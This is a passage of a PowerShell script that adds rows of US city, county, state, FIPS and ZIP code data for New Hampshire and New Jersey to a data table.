bay","Belknap","New hampshire","NH","33","03810") + $null = $Cities.Rows.Add("Atkinson","Rockingham","New hampshire","NH","33","03811") + $null = $Cities.Rows.Add("Bartlett","Carroll","New hampshire","NH","33","03812") + $null = $Cities.Rows.Add("Center conway","Carroll","New hampshire","NH","33","03813") + $null = $Cities.Rows.Add("Center ossipee","Carroll","New hampshire","NH","33","03814") + $null = $Cities.Rows.Add("Center strafford","Strafford","New hampshire","NH","33","03815") + $null = $Cities.Rows.Add("Center tuftonbor","Carroll","New hampshire","NH","33","03816") + $null = $Cities.Rows.Add("Chocorua","Carroll","New hampshire","NH","33","03817") + $null = $Cities.Rows.Add("Conway","Carroll","New hampshire","NH","33","03818") + $null = $Cities.Rows.Add("Danville","Rockingham","New hampshire","NH","33","03819") + $null = $Cities.Rows.Add("Madbury","Strafford","New hampshire","NH","33","03820") + $null = $Cities.Rows.Add("Lee","Strafford","New hampshire","NH","33","03824") + $null = $Cities.Rows.Add("Barrington","Strafford","New hampshire","NH","33","03825") + $null = $Cities.Rows.Add("East hampstead","Rockingham","New hampshire","NH","33","03826") + $null = $Cities.Rows.Add("South hampton","Rockingham","New hampshire","NH","33","03827") + $null = $Cities.Rows.Add("East wakefield","Carroll","New hampshire","NH","33","03830") + $null = $Cities.Rows.Add("Eaton center","Carroll","New hampshire","NH","33","03832") + $null = $Cities.Rows.Add("Brentwood","Rockingham","New hampshire","NH","33","03833") + $null = $Cities.Rows.Add("Farmington","Strafford","New hampshire","NH","33","03835") + $null = $Cities.Rows.Add("Freedom","Carroll","New hampshire","NH","33","03836") + $null = $Cities.Rows.Add("Gilmanton iron w","Belknap","New hampshire","NH","33","03837") + $null = $Cities.Rows.Add("Glen","Carroll","New hampshire","NH","33","03838") + $null = $Cities.Rows.Add("Gonic","Strafford","New hampshire","NH","33","03839") + $null = $Cities.Rows.Add("Greenland","Rockingham","New hampshire","NH","33","03840") + $null = $Cities.Rows.Add("Hampstead","Rockingham","New hampshire","NH","33","03841") + $null = $Cities.Rows.Add("Hampton","Rockingham","New hampshire","NH","33","03842") + $null = $Cities.Rows.Add("Hampton falls","Rockingham","New hampshire","NH","33","03844") + $null = $Cities.Rows.Add("Intervale","Carroll","New hampshire","NH","33","03845") + $null = $Cities.Rows.Add("Jackson","Carroll","New hampshire","NH","33","03846") + $null = $Cities.Rows.Add("Kingston","Rockingham","New hampshire","NH","33","03848") + $null = $Cities.Rows.Add("Madison","Carroll","New hampshire","NH","33","03849") + $null = $Cities.Rows.Add("Milton mills","Strafford","New hampshire","NH","33","03852") + $null = $Cities.Rows.Add("Mirror lake","Carroll","New hampshire","NH","33","03853") + $null = $Cities.Rows.Add("New castle","Rockingham","New hampshire","NH","33","03854") + $null = $Cities.Rows.Add("New durham","Strafford","New hampshire","NH","33","03855") + $null = $Cities.Rows.Add("Newfields","Rockingham","New hampshire","NH","33","03856") + $null = $Cities.Rows.Add("Newmarket","Rockingham","New hampshire","NH","33","03857") + $null = $Cities.Rows.Add("Newton","Rockingham","New hampshire","NH","33","03858") + $null = $Cities.Rows.Add("North conway","Carroll","New hampshire","NH","33","03860") + $null = $Cities.Rows.Add("North hampton","Rockingham","New hampshire","NH","33","03862") + $null = $Cities.Rows.Add("Ossipee","Carroll","New hampshire","NH","33","03864") + $null = $Cities.Rows.Add("Plaistow","Rockingham","New hampshire","NH","33","03865") + $null = $Cities.Rows.Add("Rochester","Strafford","New hampshire","NH","33","03867") + $null = $Cities.Rows.Add("East rochester","Strafford","New hampshire","NH","33","03868") + $null = $Cities.Rows.Add("Rollinsford","Strafford","New hampshire","NH","33","03869") + $null = $Cities.Rows.Add("Rye","Rockingham","New hampshire","NH","33","03870") + $null = $Cities.Rows.Add("Sanbornville","Carroll","New hampshire","NH","33","03872") + $null = $Cities.Rows.Add("Sandown","Rockingham","New hampshire","NH","33","03873") + $null = $Cities.Rows.Add("Seabrook","Rockingham","New hampshire","NH","33","03874") + $null = $Cities.Rows.Add("Silver lake","Carroll","New hampshire","NH","33","03875") + $null = $Cities.Rows.Add("Somersworth","Strafford","New hampshire","NH","33","03878") + $null = $Cities.Rows.Add("South effingham","Carroll","New hampshire","NH","33","03882") + $null = $Cities.Rows.Add("South tamworth","Carroll","New hampshire","NH","33","03883") + $null = $Cities.Rows.Add("Strafford","Strafford","New hampshire","NH","33","03884") + $null = $Cities.Rows.Add("Stratham","Rockingham","New hampshire","NH","33","03885") + $null = $Cities.Rows.Add("Tamworth","Carroll","New hampshire","NH","33","03886") + $null = $Cities.Rows.Add("Union","Strafford","New hampshire","NH","33","03887") + $null = $Cities.Rows.Add("Wolfeboro","Carroll","New hampshire","NH","33","03894") + $null = $Cities.Rows.Add("Wonalancet","Carroll","New hampshire","NH","33","03897") + $null = $Cities.Rows.Add("Zcta 038hh","Belknap","New hampshire","NH","33","038HH") + $null = $Cities.Rows.Add("Avenel","Middlesex","New jersey","NJ","34","07001") + $null = $Cities.Rows.Add("Bayonne","Hudson","New jersey","NJ","34","07002") + $null = $Cities.Rows.Add("Bloomfield","Essex","New jersey","NJ","34","07003") + $null = $Cities.Rows.Add("Fairfield","Essex","New jersey","NJ","34","07004") + $null = $Cities.Rows.Add("Boonton","Morris","New jersey","NJ","34","07005") + $null = $Cities.Rows.Add("West caldwell","Essex","New jersey","NJ","34","07006") + $null = $Cities.Rows.Add("Carteret","Middlesex","New jersey","NJ","34","07008") + $null = $Cities.Rows.Add("Cedar grove","Essex","New jersey","NJ","34","07009") + $null = $Cities.Rows.Add("Cliffside park","Bergen","New jersey","NJ","34","07010") + $null = $Cities.Rows.Add("Clifton","Passaic","New jersey","NJ","34","07011") + $null = $Cities.Rows.Add("Clifton","Passaic","New jersey","NJ","34","07012") + $null = $Cities.Rows.Add("Clifton","Passaic","New jersey","NJ","34","07013") + $null = $Cities.Rows.Add("Clifton","Passaic","New jersey","NJ","34","07014") + $null = $Cities.Rows.Add("Cranford","Union","New jersey","NJ","34","07016") + $null = $Cities.Rows.Add("East orange","Essex","New jersey","NJ","34","07017") + $null = $Cities.Rows.Add("East orange","Essex","New jersey","NJ","34","07018") + $null = $Cities.Rows.Add("Edgewater","Bergen","New jersey","NJ","34","07020") + $null = $Cities.Rows.Add("Essex fells","Essex","New jersey","NJ","34","07021") + $null = $Cities.Rows.Add("Fairview","Bergen","New jersey","NJ","34","07022") + $null = $Cities.Rows.Add("Fanwood","Union","New jersey","NJ","34","07023") + $null = $Cities.Rows.Add("Fort lee","Bergen","New jersey","NJ","34","07024") + $null = $Cities.Rows.Add("Garfield","Bergen","New jersey","NJ","34","07026") + $null = $Cities.Rows.Add("Garwood","Union","New jersey","NJ","34","07027") + $null = $Cities.Rows.Add("Glen ridge","Essex","New jersey","NJ","34","07028") + $null = $Cities.Rows.Add("Kearny","Hudson","New jersey","NJ","34","07029") + $null = $Cities.Rows.Add("Hoboken","Hudson","New jersey","NJ","34","07030") + $null = $Cities.Rows.Add("North arlington","Bergen","New jersey","NJ","34","07031") + $null = $Cities.Rows.Add("Kearny","Hudson","New jersey","NJ","34","07032") + $null = $Cities.Rows.Add("Kenilworth","Union","New jersey","NJ","34","07033") + $null = $Cities.Rows.Add("Lake hiawatha","Morris","New jersey","NJ","34","07034") + $null = $Cities.Rows.Add("Lincoln park","Morris","New jersey","NJ","34","07035") + $null = $Cities.Rows.Add("Linden","Union","New jersey","NJ","34","07036") + $null = $Cities.Rows.Add("Livingston","Essex","New jersey","NJ","34","07039") + $null = $Cities.Rows.Add("Maplewood","Essex","New jersey","NJ","34","07040") + $null = $Cities.Rows.Add("Millburn","Essex","New jersey","NJ","34","07041") + $null = $Cities.Rows.Add("Montclair","Essex","New jersey","NJ","34","07042") + $null = $Cities.Rows.Add("Montclair","Essex","New jersey","NJ","34","07043") + $null = $Cities.Rows.Add("Verona","Essex","New jersey","NJ","34","07044") + $null = $Cities.Rows.Add("Montville","Morris","New jersey","NJ","34","07045") + $null = $Cities.Rows.Add("Mountain lakes","Morris","New jersey","NJ","34","07046") + $null = $Cities.Rows.Add("North bergen","Hudson","New jersey","NJ","34","07047") + $null = $Cities.Rows.Add("Orange","Essex","New jersey","NJ","34","07050") + $null = $Cities.Rows.Add("West orange","Essex","New jersey","NJ","34","07052") + $null = $Cities.Rows.Add("Parsippany","Morris","New jersey","NJ","34","07054") + $null = $Cities.Rows.Add("Passaic","Passaic","New jersey","NJ","34","07055") + $null = $Cities.Rows.Add("Wallington","Bergen","New jersey","NJ","34","07057") + $null = $Cities.Rows.Add("Pine brook","Morris","New jersey","NJ","34","07058") + $null = $Cities.Rows.Add("Warren","Somerset","New jersey","NJ","34","07059") + $null = $Cities.Rows.Add("North plainfield","Union","New jersey","NJ","34","07060") + $null = $Cities.Rows.Add("North plainfield","Union","New jersey","NJ","34","07062") + $null = $Cities.Rows.Add("North plainfield","Union","New jersey","NJ","34","07063") + $null = $Cities.Rows.Add("Port reading","Middlesex","New jersey","NJ","34","07064") + $null = $Cities.Rows.Add("Rahway","Union","New jersey","NJ","34","07065") + $null = $Cities.Rows.Add("Clark","Union","New jersey","NJ","34","07066") + $null = $Cities.Rows.Add("Colonia","Middlesex","New jersey","NJ","34","07067") + $null = $Cities.Rows.Add("Roseland","Essex","New jersey","NJ","34","07068") + $null = $Cities.Rows.Add("Rutherford","Bergen","New jersey","NJ","34","07070") + $null = $Cities.Rows.Add("Lyndhurst","Bergen","New jersey","NJ","34","07071") + $null = $Cities.Rows.Add("Carlstadt","Bergen","New jersey","NJ","34","07072") + $null = $Cities.Rows.Add("East rutherford","Bergen","New jersey","NJ","34","07073") + $null = $Cities.Rows.Add("Moonachie","Bergen","New jersey","NJ","34","07074") + $null = $Cities.Rows.Add("Wood ridge","Bergen","New jersey","NJ","34","07075") + $null = $Cities.Rows.Add("Scotch plains","Union","New jersey","NJ","34","07076") + $null = $Cities.Rows.Add("Sewaren","Middlesex","New jersey","NJ","34","07077") + $null = $Cities.Rows.Add("Short hills","Essex","New jersey","NJ","34","07078") + $null = $Cities.Rows.Add("South orange","Essex","New jersey","NJ","34","07079") + $null = $Cities.Rows.Add("South plainfield","Middlesex","New jersey","NJ","34","07080") + $null = $Cities.Rows.Add("Springfield","Union","New jersey","NJ","34","07081") + $null = $Cities.Rows.Add("Towaco","Morris","New jersey","NJ","34","07082") + $null = $Cities.Rows.Add("Union","Union","New jersey","NJ","34","07083") + $null = $Cities.Rows.Add("Weehawken","Hudson","New jersey","NJ","34","07087") + $null = $Cities.Rows.Add("Vauxhall","Union","New jersey","NJ","34","07088") + $null = $Cities.Rows.Add("Westfield","Union","New jersey","NJ","34","07090") + $null = $Cities.Rows.Add("Mountainside","Union","New jersey","NJ","34","07092") + $null = $Cities.Rows.Add("Guttenberg","Hudson","New jersey","NJ","34","07093") + $null = $Cities.Rows.Add("Secaucus","Hudson","New jersey","NJ","34","07094") + $null = $Cities.Rows.Add("Woodbridge","Middlesex","New jersey","NJ","34","07095") + $null = $Cities.Rows.Add("Zcta 070hh","Bergen","New jersey","NJ","34","070HH") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07102") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07103") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07104") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07105") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07106") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07107") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07108") + $null = $Cities.Rows.Add("Belleville","Essex","New jersey","NJ","34","07109") + $null = $Cities.Rows.Add("Nutley","Essex","New jersey","NJ","34","07110") + $null = $Cities.Rows.Add("Irvington","Essex","New jersey","NJ","34","07111") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07112") + $null = $Cities.Rows.Add("Newark","Essex","New jersey","NJ","34","07114") + $null = $Cities.Rows.Add("Zcta 071hh","Essex","New jersey","NJ","34","071HH") + $null = $Cities.Rows.Add("Elizabeth","Union","New jersey","NJ","34","07201") + $null = $Cities.Rows.Add("Elizabeth","Union","New jersey","NJ","34","07202") + $null = $Cities.Rows.Add("Roselle","Union","New jersey","NJ","34","07203") + $null = $Cities.Rows.Add("Roselle park","Union","New jersey","NJ","34","07204") + $null = $Cities.Rows.Add("Hillside","Union","New jersey","NJ","34","07205") + $null = $Cities.Rows.Add("Elizabeth","Union","New jersey","NJ","34","07206") + $null = $Cities.Rows.Add("Elizabeth","Union","New jersey","NJ","34","07208") + $null = $Cities.Rows.Add("Zcta 072hh","Union","New jersey","NJ","34","072HH") + $null = $Cities.Rows.Add("Jersey city","Hudson","New jersey","NJ","34","07302") + $null = $Cities.Rows.Add("Jersey city","Hudson","New jersey","NJ","34","07304") + $null = $Cities.Rows.Add("Jersey city","Hudson","New jersey","NJ","34","07305") + $null = $Cities.Rows.Add("Jersey city","Hudson","New jersey","NJ","34","07306") + $null = $Cities.Rows.Add("Jersey city","Hudson","New jersey","NJ","34","07307") + $null = $Cities.Rows.Add("Jersey city","Hudson","New jersey","NJ","34","07310") + $null = $Cities.Rows.Add("Zcta 073hh","Hudson","New jersey","NJ","34","073HH") + $null = $Cities.Rows.Add("Allendale","Bergen","New jersey","NJ","34","07401") + $null = $Cities.Rows.Add("Bloomingdale","Passaic","New jersey","NJ","34","07403") + $null = $Cities.Rows.Add("Kinnelon","Morris","New jersey","NJ","34","07405") + $null = $Cities.Rows.Add("Elmwood park","Bergen","New jersey","NJ","34","07407") + $null = $Cities.Rows.Add("Fair lawn","Bergen","New jersey","NJ","34","07410") + $null = $Cities.Rows.Add("Franklin","Sussex","New jersey","NJ","34","07416") + $null = $Cities.Rows.Add("Franklin lakes","Bergen","New jersey","NJ","34","07417") + $null = $Cities.Rows.Add("Glenwood","Sussex","New jersey","NJ","34","07418") + $null = $Cities.Rows.Add("Hamburg","Sussex","New jersey","NJ","34","07419") + $null = $Cities.Rows.Add("Haskell","Passaic","New jersey","NJ","34","07420") + $null = $Cities.Rows.Add("Hewitt","Passaic","New jersey","NJ","34","07421") + $null = $Cities.Rows.Add("Highland lakes","Sussex","New jersey","NJ","34","07422") + $null = $Cities.Rows.Add("Ho ho kus","Bergen","New jersey","NJ","34","07423") + $null = $Cities.Rows.Add("West paterson","Passaic","New jersey","NJ","34","07424") + $null = $Cities.Rows.Add("Mc afee","Sussex","New jersey","NJ","34","07428") + $null = $Cities.Rows.Add("Mahwah","Bergen","New jersey","NJ","34","07430") + $null = $Cities.Rows.Add("Midland park","Bergen","New jersey","NJ","34","07432") + $null = $Cities.Rows.Add("Newfoundland","Passaic","New jersey","NJ","34","07435") + $null = $Cities.Rows.Add("Oakland","Bergen","New jersey","NJ","34","07436") + $null = $Cities.Rows.Add("Milton","Morris","New jersey","NJ","34","07438") + $null = $Cities.Rows.Add("Ogdensburg","Sussex","New jersey","NJ","34","07439") + $null = $Cities.Rows.Add("Pequannock","Morris","New jersey","NJ","34","07440") + $null = $Cities.Rows.Add("Pompton lakes","Passaic","New jersey","NJ","34","07442") + $null = $Cities.Rows.Add("Pompton plains","Morris","New jersey","NJ","34","07444") + $null = $Cities.Rows.Add("Ramsey","Bergen","New jersey","NJ","34","07446") + $null = $Cities.Rows.Add("Ridgewood","Bergen","New jersey","NJ","34","07450") + $null = $Cities.Rows.Add("Glen rock","Bergen","New jersey","NJ","34","07452") + $null = $Cities.Rows.Add("Ringwood","Passaic","New jersey","NJ","34","07456") + $null = $Cities.Rows.Add("Riverdale","Morris","New jersey","NJ","34","07457") + $null = $Cities.Rows.Add("Upper saddle riv","Bergen","New jersey","NJ","34","07458") + $null = $Cities.Rows.Add("Stockholm","Sussex","New jersey","NJ","34","07460") + $null = $Cities.Rows.Add("Sussex","Sussex","New jersey","NJ","34","07461") + $null = $Cities.Rows.Add("Vernon","Sussex","New jersey","NJ","34","07462") + $null = $Cities.Rows.Add("Waldwick","Bergen","New jersey","NJ","34","07463") + $null = $Cities.Rows.Add("Wanaque","Passaic","New jersey","NJ","34","07465") + $null = $Cities.Rows.Add("Wayne","Passaic","New jersey","NJ","34","07470") + $null = $Cities.Rows.Add("West milford","Passaic","New jersey","NJ","34","07480") + $null = $Cities.Rows.Add("Wyckoff","Bergen","New jersey","NJ","34","07481") + $null = $Cities.Rows.Add("Zcta 074hh","Morris","New jersey","NJ","34","074HH") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07501") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07502") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07503") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07504") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07505") + $null = $Cities.Rows.Add("Hawthorne","Passaic","New jersey","NJ","34","07506") + $null = $Cities.Rows.Add("Haledon","Passaic","New jersey","NJ","34","07508") + $null = $Cities.Rows.Add("Totowa","Passaic","New jersey","NJ","34","07512") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07513") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07514") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07522") + $null = $Cities.Rows.Add("Paterson","Passaic","New jersey","NJ","34","07524") + $null = $Cities.Rows.Add("Zcta 075hh","Passaic","New jersey","NJ","34","075HH") + $null = $Cities.Rows.Add("Hackensack","Bergen","New jersey","NJ","34","07601") + $null = $Cities.Rows.Add("Bogota","Bergen","New jersey","NJ","34","07603") + $null = $Cities.Rows.Add("Hasbrouck height","Bergen","New jersey","NJ","34","07604") + $null = $Cities.Rows.Add("Leonia","Bergen","New jersey","NJ","34","07605") + $null = $Cities.Rows.Add("South hackensack","Bergen","New jersey","NJ","34","07606") + $null = $Cities.Rows.Add("Maywood","Bergen","New jersey","NJ","34","07607") + $null = $Cities.Rows.Add("Teterboro","Bergen","New jersey","NJ","34","07608") + $null = $Cities.Rows.Add("Alpine","Bergen","New jersey","NJ","34","07620") + $null = $Cities.Rows.Add("Bergenfield","Bergen","New jersey","NJ","34","07621") + $null = $Cities.Rows.Add("Closter","Bergen","New jersey","NJ","34","07624") + $null = $Cities.Rows.Add("Cresskill","Bergen","New jersey","NJ","34","07626") + $null = $Cities.Rows.Add("Demarest","Bergen","New jersey","NJ","34","07627") + $null = $Cities.Rows.Add("Dumont","Bergen","New jersey","NJ","34","07628") + $null = $Cities.Rows.Add("Emerson","Bergen","New jersey","NJ","34","07630") + $null = $Cities.Rows.Add("Englewood","Bergen","New jersey","NJ","34","07631") + $null = $Cities.Rows.Add("Englewood cliffs","Bergen","New jersey","NJ","34","07632") + $null = $Cities.Rows.Add("Harrington park","Bergen","New jersey","NJ","34","07640") + $null = $Cities.Rows.Add("Haworth","Bergen","New jersey","NJ","34","07641") + $null = $Cities.Rows.Add("Hillsdale","Bergen","New jersey","NJ","34","07642") + $null = $Cities.Rows.Add("Little ferry","Bergen","New jersey","NJ","34","07643") + $null = $Cities.Rows.Add("Lodi","Bergen","New jersey","NJ","34","07644") + $null = $Cities.Rows.Add("Montvale","Bergen","New jersey","NJ","34","07645") + $null = $Cities.Rows.Add("New milford","Bergen","New jersey","NJ","34","07646") + $null = $Cities.Rows.Add("Rockleigh","Bergen","New jersey","NJ","34","07647") + $null = $Cities.Rows.Add("Norwood","Bergen","New jersey","NJ","34","07648") + $null = $Cities.Rows.Add("Oradell","Bergen","New jersey","NJ","34","07649") + $null = $Cities.Rows.Add("Palisades park","Bergen","New jersey","NJ","34","07650") + $null = $Cities.Rows.Add("Paramus","Bergen","New jersey","NJ","34","07652") + $null = $Cities.Rows.Add("Park ridge","Bergen","New jersey","NJ","34","07656") + $null = $Cities.Rows.Add("Ridgefield","Bergen","New jersey","NJ","34","07657") + $null = $Cities.Rows.Add("Ridgefield park","Bergen","New jersey","NJ","34","07660") + $null = $Cities.Rows.Add("River edge","Bergen","New jersey","NJ","34","07661") + $null = $Cities.Rows.Add("Saddle brook","Bergen","New jersey","NJ","34","07662") + $null = $Cities.Rows.Add("Zcta 07663","Bergen","New jersey","NJ","34","07663") + $null = $Cities.Rows.Add("Teaneck","Bergen","New jersey","NJ","34","07666") + $null = $Cities.Rows.Add("Tenafly","Bergen","New jersey","NJ","34","07670") + $null = $Cities.Rows.Add("Old tappan","Bergen","New jersey","NJ","34","07675") + $null = $Cities.Rows.Add("Zcta 076hh","Bergen","New jersey","NJ","34","076HH") + $null = $Cities.Rows.Add("Suburban","Monmouth","New jersey","NJ","34","07701") + $null = $Cities.Rows.Add("Shrewsbury","Monmouth","New jersey","NJ","34","07702") + $null = $Cities.Rows.Add("Fort monmouth","Monmouth","New jersey","NJ","34","07703") + $null = $Cities.Rows.Add("Fair haven","Monmouth","New jersey","NJ","34","07704") + $null = $Cities.Rows.Add("Allenhurst","Monmouth","New jersey","NJ","34","07711") + $null = $Cities.Rows.Add("Ocean","Monmouth","New jersey","NJ","34","07712") + $null = $Cities.Rows.Add("Atlantic highlan","Monmouth","New jersey","NJ","34","07716") + $null = $Cities.Rows.Add("Avon by the sea","Monmouth","New jersey","NJ","34","07717") + $null = $Cities.Rows.Add("Belford","Monmouth","New jersey","NJ","34","07718") + $null = $Cities.Rows.Add("Wall","Monmouth","New jersey","NJ","34","07719") + $null = $Cities.Rows.Add("Bradley beach","Monmouth","New jersey","NJ","34","07720") + $null = $Cities.Rows.Add("Cliffwood","Monmouth","New jersey","NJ","34","07721") + $null = $Cities.Rows.Add("Colts neck","Monmouth","New jersey","NJ","34","07722") + $null = $Cities.Rows.Add("Deal","Monmouth","New jersey","NJ","34","07723") + $null = $Cities.Rows.Add("Eatontown","Monmouth","New jersey","NJ","34","07724") + $null = $Cities.Rows.Add("Manalapan","Monmouth","New jersey","NJ","34","07726") + $null = $Cities.Rows.Add("Farmingdale","Monmouth","New jersey","NJ","34","07727") + $null = $Cities.Rows.Add("Freehold","Monmouth","New jersey","NJ","34","07728") + $null = $Cities.Rows.Add("Hazlet","Monmouth","New jersey","NJ","34","07730") + $null = $Cities.Rows.Add("Howell","Monmouth","New jersey","NJ","34","07731") + $null = $Cities.Rows.Add("Fort hancock","Monmouth","New jersey","NJ","34","07732") + $null = $Cities.Rows.Add("Holmdel","Monmouth","New jersey","NJ","34","07733") + $null = $Cities.Rows.Add("Keansburg","Monmouth","New jersey","NJ","34","07734") + $null = $Cities.Rows.Add("Keyport","Monmouth","New jersey","NJ","34","07735") + $null = $Cities.Rows.Add("Leonardo","Monmouth","New jersey","NJ","34","07737") + $null = $Cities.Rows.Add("Lincroft","Monmouth","New jersey","NJ","34","07738") + $null = $Cities.Rows.Add("Little silver","Monmouth","New jersey","NJ","34","07739") + $null = $Cities.Rows.Add("Long branch","Monmouth","New jersey","NJ","34","07740") + $null = $Cities.Rows.Add("Marlboro","Monmouth","New jersey","NJ","34","07746") + $null = $Cities.Rows.Add("Matawan","Monmouth","New jersey","NJ","34","07747") + $null = $Cities.Rows.Add("New monmouth","Monmouth","New jersey","NJ","34","07748") + $null = $Cities.Rows.Add("Monmouth beach","Monmouth","New jersey","NJ","34","07750") + $null = $Cities.Rows.Add("Morganville","Monmouth","New jersey","NJ","34","07751") + $null = $Cities.Rows.Add("Neptune city","Monmouth","New jersey","NJ","34","07753") + $null = $Cities.Rows.Add("Oakhurst","Monmouth","New jersey","NJ","34","07755") + $null = $Cities.Rows.Add("Ocean grove","Monmouth","New jersey","NJ","34","07756") + $null = $Cities.Rows.Add("Oceanport","Monmouth","New jersey","NJ","34","07757") + $null = $Cities.Rows.Add("Port monmouth","Monmouth","New jersey","NJ","34","07758") + $null = $Cities.Rows.Add("Sea bright","Monmouth","New jersey","NJ","34","07760") + $null = $Cities.Rows.Add("Spring lake","Monmouth","New jersey","NJ","34","07762") + $null = $Cities.Rows.Add("West long branch","Monmouth","New jersey","NJ","34","07764") + $null = $Cities.Rows.Add("Zcta 077hh","Middlesex","New jersey","NJ","34","077HH") + $null = $Cities.Rows.Add("Mine hill","Morris","New jersey","NJ","34","07801") + $null = $Cities.Rows.Add("Zcta 07803","Morris","New jersey","NJ","34","07803") + $null = $Cities.Rows.Add("Andover","Sussex","New jersey","NJ","34","07821") + $null = $Cities.Rows.Add("Augusta","Sussex","New jersey","NJ","34","07822") + $null = $Cities.Rows.Add("Belvidere","Warren","New jersey","NJ","34","07823") + $null = $Cities.Rows.Add("Blairstown","Warren","New jersey","NJ","34","07825") + $null = $Cities.Rows.Add("Branchville","Sussex","New jersey","NJ","34","07826") + $null = $Cities.Rows.Add("Montague","Sussex","New jersey","NJ","34","07827") + $null = $Cities.Rows.Add("Budd lake","Morris","New jersey","NJ","34","07828") + $null = $Cities.Rows.Add("Califon","Hunterdon","New jersey","NJ","34","07830") + $null = $Cities.Rows.Add("Columbia","Warren","New jersey","NJ","34","07832") + $null = $Cities.Rows.Add("Delaware","Warren","New jersey","NJ","34","07833") + $null = $Cities.Rows.Add("Denville","Morris","New jersey","NJ","34","07834") + $null = $Cities.Rows.Add("Flanders","Morris","New jersey","NJ","34","07836") + $null = $Cities.Rows.Add("Great meadows","Warren","New jersey","NJ","34","07838") + $null = $Cities.Rows.Add("Hackettstown","Warren","New jersey","NJ","34","07840") + $null = $Cities.Rows.Add("Hibernia","Morris","New jersey","NJ","34","07842") + $null = $Cities.Rows.Add("Hopatcong","Sussex","New jersey","NJ","34","07843") + $null = $Cities.Rows.Add("Johnsonburg","Warren","New jersey","NJ","34","07846") + $null = $Cities.Rows.Add("Kenvil","Morris","New jersey","NJ","34","07847") + $null = $Cities.Rows.Add("Lafayette","Sussex","New jersey","NJ","34","07848") + $null = $Cities.Rows.Add("Lake hopatcong","Morris","New jersey","NJ","34","07849") + $null = $Cities.Rows.Add("Landing","Morris","New jersey","NJ","34","07850") + $null = $Cities.Rows.Add("Layton","Sussex","New jersey","NJ","34","07851") + $null = $Cities.Rows.Add("Ledgewood","Morris","New jersey","NJ","34","07852") + $null = $Cities.Rows.Add("Long valley","Morris","New jersey","NJ","34","07853") + $null = $Cities.Rows.Add("Mount arlington","Morris","New jersey","NJ","34","07856") + $null = $Cities.Rows.Add("Netcong","Morris","New jersey","NJ","34","07857") + $null = $Cities.Rows.Add("Fredon township","Sussex","New jersey","NJ","34","07860") + $null = $Cities.Rows.Add("Oxford","Warren","New jersey","NJ","34","07863") + $null = $Cities.Rows.Add("Port murray","Warren","New jersey","NJ","34","07865") + $null = $Cities.Rows.Add("Rockaway","Morris","New jersey","NJ","34","07866") + $null = $Cities.Rows.Add("Randolph","Morris","New jersey","NJ","34","07869") + $null = $Cities.Rows.Add("Sparta","Sussex","New jersey","NJ","34","07871") + $null = $Cities.Rows.Add("Stanhope","Sussex","New jersey","NJ","34","07874") + $null = $Cities.Rows.Add("Succasunna","Morris","New jersey","NJ","34","07876") + $null = $Cities.Rows.Add("Mount tabor","Morris","New jersey","NJ","34","07878") + $null = $Cities.Rows.Add("Washington","Warren","New jersey","NJ","34","07882") + $null = $Cities.Rows.Add("Wharton","Morris","New jersey","NJ","34","07885") + $null = $Cities.Rows.Add("Zcta 078hh","Morris","New jersey","NJ","34","078HH") + $null = $Cities.Rows.Add("Summit","Union","New jersey","NJ","34","07901") + $null = $Cities.Rows.Add("Basking ridge","Somerset","New jersey","NJ","34","07920") + $null = $Cities.Rows.Add("Bedminster","Somerset","New jersey","NJ","34","07921") + $null = $Cities.Rows.Add("Berkeley heights","Union","New jersey","NJ","34","07922") + $null = $Cities.Rows.Add("Bernardsville","Somerset","New jersey","NJ","34","07924") + $null = $Cities.Rows.Add("Cedar knolls","Morris","New jersey","NJ","34","07927") + $null = $Cities.Rows.Add("Chatham","Morris","New jersey","NJ","34","07928") + $null = $Cities.Rows.Add("Chester","Morris","New jersey","NJ","34","07930") + $null = $Cities.Rows.Add("Far hills","Somerset","New jersey","NJ","34","07931") + $null = $Cities.Rows.Add("Florham park","Morris","New jersey","NJ","34","07932") + $null = $Cities.Rows.Add("Gillette","Morris","New jersey","NJ","34","07933") + $null = $Cities.Rows.Add("Gladstone","Somerset","New jersey","NJ","34","07934") + $null = $Cities.Rows.Add("Green village","Morris","New jersey","NJ","34","07935") + $null = $Cities.Rows.Add("East hanover","Morris","New jersey","NJ","34","07936") + $null = $Cities.Rows.Add("Madison","Morris","New jersey","NJ","34","07940") + $null = $Cities.Rows.Add("Mendham","Morris","New jersey","NJ","34","07945") + $null = $Cities.Rows.Add("Millington","Morris","New jersey","NJ","34","07946") + $null = $Cities.Rows.Add("Greystone park","Morris","New jersey","NJ","34","07950") + $null = $Cities.Rows.Add("Morristown","Morris","New jersey","NJ","34","07960") + $null = $Cities.Rows.Add("Mount freedom","Morris","New jersey","NJ","34","07970") + $null = $Cities.Rows.Add("New providence","Union","New jersey","NJ","34","07974") + $null = $Cities.Rows.Add("New vernon","Morris","New jersey","NJ","34","07976") + $null = $Cities.Rows.Add("Peapack","Somerset","New jersey","NJ","34","07977") + $null = $Cities.Rows.Add("Pottersville","Hunterdon","New jersey","NJ","34","07979") + $null = $Cities.Rows.Add("Stirling","Morris","New jersey","NJ","34","07980") + $null = $Cities.Rows.Add("Whippany","Morris","New jersey","NJ","34","07981") + $null = $Cities.Rows.Add("Alloway","Salem","New jersey","NJ","34","08001") + $null = $Cities.Rows.Add("Cherry hill","Camden","New jersey","NJ","34","08002") + $null = $Cities.Rows.Add("Cherry hill","Camden","New jersey","NJ","34","08003") + $null = $Cities.Rows.Add("Winslow","Camden","New jersey","NJ","34","08004") + $null = $Cities.Rows.Add("Barnegat","Ocean","New jersey","NJ","34","08005") + $null = $Cities.Rows.Add("Barnegat light","Ocean","New 